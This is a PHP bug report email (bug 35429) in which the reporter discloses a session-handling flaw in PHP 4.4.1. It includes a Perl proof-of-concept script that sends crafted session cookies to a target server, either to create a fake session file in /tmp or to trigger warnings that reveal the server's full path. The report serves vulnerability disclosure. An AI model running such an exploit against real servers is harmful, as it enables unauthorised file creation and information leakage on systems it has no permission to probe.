From: sienicki dot kamil at gmail dot com
Operating system: Linux/Windows (all?)
PHP version: 4.4.1
PHP Bug Type: Unknown/Other Function
Bug description: problem with sessions..
Description:
------------
I write simple exploit to show this vuln.. (i think..)
problem with sessions..
--
#!/usr/bin/perl
#
# PHP vulnerabilities..
#
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
#
# I found two possibility of use that bug.. (maybe more)
#
# display_errors must be On
#
use IO::Socket;
if(@ARGV < 3)
{
print "\n";
print "PHP Exploit (POC)\n";
print " by Kamil 'K3' Sienicki\n\n";
print "1. Create fake session file (sess_fake) in directory (default
/tmp). \n";
print "2. Full path disclosure.\n\n";
print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or
2)]\n\n";
exit;
}
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]",
PeerPort => "80" ) || die "[-] Connect failed! \r\n";
if($ARGV[2] == 1)
{
print "\n";
print "PHP Exploit (POC)\n";
print " by Kamil 'K3' Sienicki\n\n";
print "Name of session (default PHPSESSID): ";
$sess = <stdin>;
print "Name of fake sess_file: ";
$fake = <stdin>;
chomp($sess,$fake);
print $socket "GET $ARGV[1] HTTP/1.0\n";
print $socket "Cookie: $sess=$fake\n\n";
print "'$fake' fake file was created.. \n";
} elsif ($ARGV[2] == 2)
{
print "\n";
print "PHP Exploit (POC)\n";
print " by Kamil 'K3' Sienicki\n\n";
print "Name of session (default PHPSESSID): ";
$sess = <stdin>;
chomp($sess);
print $socket "GET $ARGV[1] HTTP/1.0\n";
print $socket "Cookie: [EMAIL PROTECTED]";
while ($answer = <$socket>)
{
if ($answer =~ m/^...Warning/)
{
print $answer."\n";
}
}
}
--
Reproduce code:
---------------
<?
session_start();
?>
Expected result:
----------------
Warning: session_start(): The session id contains invalid characters,
valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3
Warning: Unknown(): The session id contains invalid characters, valid
characters are only a-z, A-Z and 0-9 in Unknown on line 0
Warning: Unknown(): Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (/tmp) in Unknown
on line 0
Full path disclosure..
--
Edit bug report at http://bugs.php.net/?id=35429&edit=1
--
Try a CVS snapshot (php4): http://bugs.php.net/fix.php?id=35429&r=trysnapshot4
Try a CVS snapshot (php5.0):
http://bugs.php.net/fix.php?id=35429&r=trysnapshot50
Try a CVS snapshot (php5.1):
http://bugs.php.net/fix.php?id=35429&r=trysnapshot51
Fixed in CVS: http://bugs.php.net/fix.php?id=35429&r=fixedcvs
Fixed in release: http://bugs.php.net/fix.php?id=35429&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=35429&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=35429&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=35429&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=35429&r=support
Expected behavior: http://bugs.php.net/fix.php?id=35429&r=notwrong
Not enough info:
http://bugs.php.net/fix.php?id=35429&r=notenoughinfo
Submitted twice:
http://bugs.php.net/fix.php?id=35429&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=35429&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=35429&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=35429&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=35429&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=35429&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=35429&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=35429&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=35429&r=mysqlcfg
